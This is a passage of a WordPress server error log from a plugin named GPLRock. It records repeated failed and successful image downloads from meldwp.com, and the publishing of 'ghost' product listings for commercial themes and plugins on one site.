GPLRock: Image download failed for product vg-cooku-clean-simple-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:31 UTC] GPLRock: Image download failed for product vg-cooku-clean-simple-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-cooku---clean-simple-woocommerce-wordpress-theme-23475.webp for product vg-cooku-clean-simple-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:15:33 UTC] GPLRock: Image download failed for product vg-cooku-clean-simple-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:35 UTC] GPLRock: Image download failed for product vg-cooku-clean-simple-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-cooku---clean-simple-woocommerce-wordpress-theme-23475.webp for product vg-cooku-clean-simple-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:15:37 UTC] GPLRock WARNING: Image download failed for product vg-cooku-clean-simple-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vg-cooku---clean-simple-woocommerce-wordpress-theme-23475.webp [05-Apr-2026 19:15:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vg-cooku-clean-simple-woocommerce-wordpress-theme [05-Apr-2026 19:15:37 UTC] GPLRock: Image download failed for product smokio-tobacco-cannabis-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:40 UTC] GPLRock: Image download failed for product smokio-tobacco-cannabis-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smokio---tobacco--cannabis-wordpress-theme-4206.webp for product smokio-tobacco-cannabis-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:15:42 UTC] GPLRock: Image download failed for product smokio-tobacco-cannabis-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:44 UTC] GPLRock: Image download failed for product smokio-tobacco-cannabis-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smokio---tobacco--cannabis-wordpress-theme-4206.webp for product smokio-tobacco-cannabis-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:15:46 UTC] GPLRock WARNING: Image download failed for product smokio-tobacco-cannabis-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/smokio---tobacco--cannabis-wordpress-theme-4206.webp [05-Apr-2026 19:15:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smokio-tobacco-cannabis-wordpress-theme [05-Apr-2026 19:16:17 UTC] GPLRock: Image download failed for product premium-section-add-ons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:19 UTC] GPLRock: Image download failed for product premium-section-add-ons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-section-add-ons-for-elementor-18128.webp for product premium-section-add-ons-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:16:21 UTC] GPLRock: Image download failed for product premium-section-add-ons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:23 UTC] GPLRock: Image download failed for product premium-section-add-ons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-section-add-ons-for-elementor-18128.webp for product premium-section-add-ons-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:16:25 UTC] GPLRock WARNING: Image download failed for product premium-section-add-ons-for-elementor. URL: https://meldwp.com/wp-content/uploads/premium-section-add-ons-for-elementor-18128.webp [05-Apr-2026 19:16:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: premium-section-add-ons-for-elementor [05-Apr-2026 19:16:26 UTC] GPLRock: Image download failed for product highlighter-highlighted-heading-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:28 UTC] GPLRock: Image download failed for product highlighter-highlighted-heading-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/highlighter--highlighted-heading-for-elementor-18817.webp for product highlighter-highlighted-heading-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:16:30 UTC] GPLRock: Image download failed for product highlighter-highlighted-heading-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:32 UTC] GPLRock: Image download failed for product highlighter-highlighted-heading-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/highlighter--highlighted-heading-for-elementor-18817.webp for product highlighter-highlighted-heading-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:16:34 UTC] GPLRock WARNING: Image download failed for product highlighter-highlighted-heading-for-elementor. URL: https://meldwp.com/wp-content/uploads/highlighter--highlighted-heading-for-elementor-18817.webp [05-Apr-2026 19:16:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: highlighter-highlighted-heading-for-elementor [05-Apr-2026 19:16:34 UTC] GPLRock: Image download failed for product stylish-links-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:37 UTC] GPLRock: Image download failed for product stylish-links-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stylish-links-pro-17056.webp for product stylish-links-pro after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:16:39 UTC] GPLRock: Image download failed for product stylish-links-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:41 UTC] GPLRock: Image download failed for product stylish-links-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stylish-links-pro-17056.webp for product stylish-links-pro after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:16:43 UTC] GPLRock WARNING: Image download failed for product stylish-links-pro. URL: https://meldwp.com/wp-content/uploads/stylish-links-pro-17056.webp [05-Apr-2026 19:16:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stylish-links-pro [05-Apr-2026 19:16:43 UTC] GPLRock: Image downloaded successfully for product eventcommerce-wp-responsive-event-calendar-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-595e9a33.webp [05-Apr-2026 19:16:43 UTC] GPLRock: Using pre-downloaded image for product eventcommerce-wp-responsive-event-calendar-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-595e9a33.webp [05-Apr-2026 19:16:43 UTC] GPLRock: Ghost product published with image - Product ID: eventcommerce-wp-responsive-event-calendar-pro [05-Apr-2026 19:16:43 UTC] GPLRock: Image download failed for product cashback-tracker-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:45 UTC] GPLRock: Image download failed for product cashback-tracker-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cashback-tracker-wordpress-plugin-7042.webp for product cashback-tracker-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:16:48 UTC] GPLRock: Image download failed for product cashback-tracker-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:50 UTC] GPLRock: Image download failed for product cashback-tracker-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cashback-tracker-wordpress-plugin-7042.webp for product cashback-tracker-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:16:52 UTC] GPLRock WARNING: Image download failed for product cashback-tracker-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/cashback-tracker-wordpress-plugin-7042.webp [05-Apr-2026 19:16:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cashback-tracker-wordpress-plugin [05-Apr-2026 19:16:52 UTC] GPLRock: Image download failed for product streamit-live-video-streaming-player-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:54 UTC] GPLRock: Image download failed for product streamit-live-video-streaming-player-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/streamit---live-video-streaming-player-wordpress-plugin-20077.webp for product streamit-live-video-streaming-player-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:16:57 UTC] GPLRock: Image download failed for product streamit-live-video-streaming-player-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:16:59 UTC] GPLRock: Image download failed for product streamit-live-video-streaming-player-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:17:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/streamit---live-video-streaming-player-wordpress-plugin-20077.webp for product streamit-live-video-streaming-player-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:17:01 UTC] GPLRock WARNING: Image download failed for product streamit-live-video-streaming-player-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/streamit---live-video-streaming-player-wordpress-plugin-20077.webp [05-Apr-2026 19:17:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: streamit-live-video-streaming-player-wordpress-plugin [05-Apr-2026 19:17:02 UTC] GPLRock: Image download failed for product foodbook-online-food-ordering-delivery-for-wordpress-with-restaurant-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:17:04 UTC] GPLRock: Image download failed for product foodbook-online-food-ordering-delivery-for-wordpress-with-restaurant-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:17:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodbook--online-food-ordering--delivery-for-wordpress-with-restaurant-managemen-5728.webp for product foodbook-online-food-ordering-delivery-for-wordpress-with-restaurant-management-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:17:07 UTC] GPLRock: Image download failed for product foodbook-online-food-ordering-delivery-for-wordpress-with-restaurant-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:17:09 UTC] GPLRock: Image download failed for product foodbook-online-food-ordering-delivery-for-wordpress-with-restaurant-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:17:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodbook--online-food-ordering--delivery-for-wordpress-with-restaurant-managemen-5728.webp for product foodbook-online-food-ordering-delivery-for-wordpress-with-restaurant-management-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:17:11 UTC] GPLRock WARNING: Image download failed for product foodbook-online-food-ordering-delivery-for-wordpress-with-restaurant-management-system. URL: https://meldwp.com/wp-content/uploads/foodbook--online-food-ordering--delivery-for-wordpress-with-restaurant-managemen-5728.webp [05-Apr-2026 19:17:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foodbook-online-food-ordering-delivery-for-wordpress-with-restaurant-management-system [05-Apr-2026 19:17:11 UTC] GPLRock: Image downloaded successfully for product liker-wordpress-rating-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c0f1beb6.webp [05-Apr-2026 19:17:11 UTC] GPLRock: Using pre-downloaded image for product liker-wordpress-rating-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c0f1beb6.webp [05-Apr-2026 19:17:11 UTC] GPLRock: Ghost product published with image - Product ID: liker-wordpress-rating-plugin [05-Apr-2026 19:17:11 UTC] GPLRock: Image downloaded successfully for product saleserp-ai-powered-business-erp-for-sales-billing-inventory-accounting-and-hr (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f322b2ee.webp [05-Apr-2026 19:17:11 UTC] GPLRock: Using pre-downloaded image for product saleserp-ai-powered-business-erp-for-sales-billing-inventory-accounting-and-hr: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f322b2ee.webp [05-Apr-2026 19:17:11 UTC] GPLRock: Ghost product published with image - Product ID: saleserp-ai-powered-business-erp-for-sales-billing-inventory-accounting-and-hr [05-Apr-2026 19:17:11 UTC] GPLRock: Image download failed for product purolator-woocommerce-shipping-plugin-for-rates-and-tracking (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:17:13 UTC] GPLRock: Image download failed for product purolator-woocommerce-shipping-plugin-for-rates-and-tracking (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:17:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/purolator-woocommerce-shipping-plugin-for-rates-and-tracking-26034.webp for product purolator-woocommerce-shipping-plugin-for-rates-and-tracking after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:17:16 UTC] GPLRock: Image download failed for product purolator-woocommerce-shipping-plugin-for-rates-and-tracking (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:17:18 UTC] GPLRock: Image download failed for product purolator-woocommerce-shipping-plugin-for-rates-and-tracking (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:17:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/purolator-woocommerce-shipping-plugin-for-rates-and-tracking-26034.webp for product purolator-woocommerce-shipping-plugin-for-rates-and-tracking after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:17:20 UTC] GPLRock WARNING: Image download failed for product purolator-woocommerce-shipping-plugin-for-rates-and-tracking. URL: https://meldwp.com/wp-content/uploads/purolator-woocommerce-shipping-plugin-for-rates-and-tracking-26034.webp [05-Apr-2026 19:17:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: purolator-woocommerce-shipping-plugin-for-rates-and-tracking [05-Apr-2026 19:18:16 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-statistics-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-131ae9a4.jpg [05-Apr-2026 19:18:16 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-statistics-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-131ae9a4.jpg [05-Apr-2026 19:18:16 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-statistics-addon [05-Apr-2026 19:18:18 UTC] GPLRock: Image downloaded successfully for product mythemeshop-dividend-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4ef246d3.jpg [05-Apr-2026 19:18:18 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-dividend-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4ef246d3.jpg [05-Apr-2026 19:18:18 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-dividend-wordpress-theme [05-Apr-2026 19:18:20 UTC] GPLRock: Image downloaded successfully for product woochimp-woocommerce-mailchimp-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e6a57bc.jpg [05-Apr-2026 19:18:20 UTC] GPLRock: Using pre-downloaded image for product woochimp-woocommerce-mailchimp-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e6a57bc.jpg [05-Apr-2026 19:18:20 UTC] GPLRock: Ghost product published with image - Product ID: woochimp-woocommerce-mailchimp-integration [05-Apr-2026 19:18:21 UTC] GPLRock: Image downloaded successfully for product woocommerce-custom-t-shirt-designer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a2985549.jpg [05-Apr-2026 19:18:22 UTC] GPLRock: Using pre-downloaded image for product woocommerce-custom-t-shirt-designer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a2985549.jpg [05-Apr-2026 19:18:22 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-custom-t-shirt-designer [05-Apr-2026 19:18:23 UTC] GPLRock: Image downloaded successfully for product woocommerce-advanced-quantity (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cc00df2a.jpg [05-Apr-2026 19:18:23 UTC] GPLRock: Using pre-downloaded image for product woocommerce-advanced-quantity: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cc00df2a.jpg [05-Apr-2026 19:18:23 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-advanced-quantity [05-Apr-2026 19:18:24 UTC] GPLRock: Image downloaded successfully for product wpfomify-edd-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6df58a90.jpg [05-Apr-2026 19:18:24 UTC] GPLRock: Using pre-downloaded image for product wpfomify-edd-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6df58a90.jpg [05-Apr-2026 19:18:24 UTC] GPLRock: Ghost product published with image - Product ID: wpfomify-edd-addon [05-Apr-2026 19:18:26 UTC] GPLRock: Image downloaded successfully for product mythemeshop-blocks-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dc921c7e.jpg [05-Apr-2026 19:18:26 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-blocks-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dc921c7e.jpg [05-Apr-2026 19:18:26 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-blocks-wordpress-theme [05-Apr-2026 19:18:28 UTC] GPLRock: Image downloaded successfully for product css-igniter-moliere-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-709cb884.jpg [05-Apr-2026 19:18:28 UTC] GPLRock: Using pre-downloaded image for product css-igniter-moliere-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-709cb884.jpg [05-Apr-2026 19:18:28 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-moliere-wordpress-theme [05-Apr-2026 19:18:29 UTC] GPLRock: Image downloaded successfully for product give-constant-contact (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-469c58d3.jpg [05-Apr-2026 19:18:30 UTC] GPLRock: Using pre-downloaded image for product give-constant-contact: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-469c58d3.jpg [05-Apr-2026 19:18:30 UTC] GPLRock: Ghost product published with image - Product ID: give-constant-contact [05-Apr-2026 19:18:31 UTC] GPLRock: Image downloaded successfully for product studiopress-course-maker-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-010c4001.jpg [05-Apr-2026 19:18:31 UTC] GPLRock: Using pre-downloaded image for product studiopress-course-maker-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-010c4001.jpg [05-Apr-2026 19:18:31 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-course-maker-pro-genesis-wordpress-theme [05-Apr-2026 19:20:16 UTC] GPLRock: Image download failed for product nevia-responsive-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:20:18 UTC] GPLRock: Image download failed for product nevia-responsive-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:20:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nevia---responsive-html5-template-25414.webp for product nevia-responsive-html5-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:20:20 UTC] GPLRock: Image download failed for product nevia-responsive-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:20:22 UTC] GPLRock: Image download failed for product nevia-responsive-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:14 UTC] GPLRock: Image download failed for product ephesus-creative-coming-soon-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:16 UTC] GPLRock: Image download failed for product ephesus-creative-coming-soon-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ephesus---creative-coming-soon-wordpress-plugin-3466.webp for product ephesus-creative-coming-soon-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:30:19 UTC] GPLRock: Image download failed for product ephesus-creative-coming-soon-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:21 UTC] GPLRock: Image download failed for product ephesus-creative-coming-soon-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ephesus---creative-coming-soon-wordpress-plugin-3466.webp for product ephesus-creative-coming-soon-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:30:23 UTC] GPLRock WARNING: Image download failed for product ephesus-creative-coming-soon-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/ephesus---creative-coming-soon-wordpress-plugin-3466.webp [05-Apr-2026 19:30:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ephesus-creative-coming-soon-wordpress-plugin [05-Apr-2026 19:30:23 UTC] GPLRock: Image download failed for product mailchimp-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:25 UTC] GPLRock: Image download failed for product mailchimp-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mailchimp-for-nex-forms-7740.webp for product mailchimp-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:30:27 UTC] GPLRock: Image download failed for product mailchimp-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:30 UTC] GPLRock: Image download failed for product mailchimp-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mailchimp-for-nex-forms-7740.webp for product mailchimp-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:30:32 UTC] GPLRock WARNING: Image download failed for product mailchimp-for-nex-forms. URL: https://meldwp.com/wp-content/uploads/mailchimp-for-nex-forms-7740.webp [05-Apr-2026 19:30:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mailchimp-for-nex-forms [05-Apr-2026 19:30:32 UTC] GPLRock: Image download failed for product video-gallery-pro-jquery-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:34 UTC] GPLRock: Image download failed for product video-gallery-pro-jquery-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-gallery-pro-jquery-addon-for-wpbakery-page-builder-27992.webp for product video-gallery-pro-jquery-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:30:36 UTC] GPLRock: Image download failed for product video-gallery-pro-jquery-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:38 UTC] GPLRock: Image download failed for product video-gallery-pro-jquery-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-gallery-pro-jquery-addon-for-wpbakery-page-builder-27992.webp for product video-gallery-pro-jquery-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:30:40 UTC] GPLRock WARNING: Image download failed for product video-gallery-pro-jquery-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/video-gallery-pro-jquery-addon-for-wpbakery-page-builder-27992.webp [05-Apr-2026 19:30:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: video-gallery-pro-jquery-addon-for-wpbakery-page-builder [05-Apr-2026 19:30:40 UTC] GPLRock: Image download failed for product responsive-rss-timeline (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:43 UTC] GPLRock: Image download failed for product responsive-rss-timeline (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-rss-timeline-22829.webp for product responsive-rss-timeline after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:30:45 UTC] GPLRock: Image download failed for product responsive-rss-timeline (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:47 UTC] GPLRock: Image download failed for product responsive-rss-timeline (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-rss-timeline-22829.webp for product responsive-rss-timeline after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:30:49 UTC] GPLRock WARNING: Image download failed for product responsive-rss-timeline. URL: https://meldwp.com/wp-content/uploads/responsive-rss-timeline-22829.webp [05-Apr-2026 19:30:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: responsive-rss-timeline [05-Apr-2026 19:30:49 UTC] GPLRock: Image download failed for product custom-fields-for-woocommerce-checkout-block (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:51 UTC] GPLRock: Image download failed for product custom-fields-for-woocommerce-checkout-block (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-fields-for-woocommerce-checkout-block-9342.webp for product custom-fields-for-woocommerce-checkout-block after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:30:54 UTC] GPLRock: Image download failed for product custom-fields-for-woocommerce-checkout-block (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:56 UTC] GPLRock: Image download failed for product custom-fields-for-woocommerce-checkout-block (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:30:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-fields-for-woocommerce-checkout-block-9342.webp for product custom-fields-for-woocommerce-checkout-block after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:30:58 UTC] GPLRock WARNING: Image download failed for product custom-fields-for-woocommerce-checkout-block. URL: https://meldwp.com/wp-content/uploads/custom-fields-for-woocommerce-checkout-block-9342.webp [05-Apr-2026 19:30:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: custom-fields-for-woocommerce-checkout-block [05-Apr-2026 19:30:58 UTC] GPLRock: Image download failed for product betlab-sports-betting-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:00 UTC] GPLRock: Image download failed for product betlab-sports-betting-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/betlab---sports-betting-platform-19383.webp for product betlab-sports-betting-platform after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:31:02 UTC] GPLRock: Image download failed for product betlab-sports-betting-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:04 UTC] GPLRock: Image download failed for product betlab-sports-betting-platform (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:31:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/betlab---sports-betting-platform-19383.webp for product betlab-sports-betting-platform after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:31:07 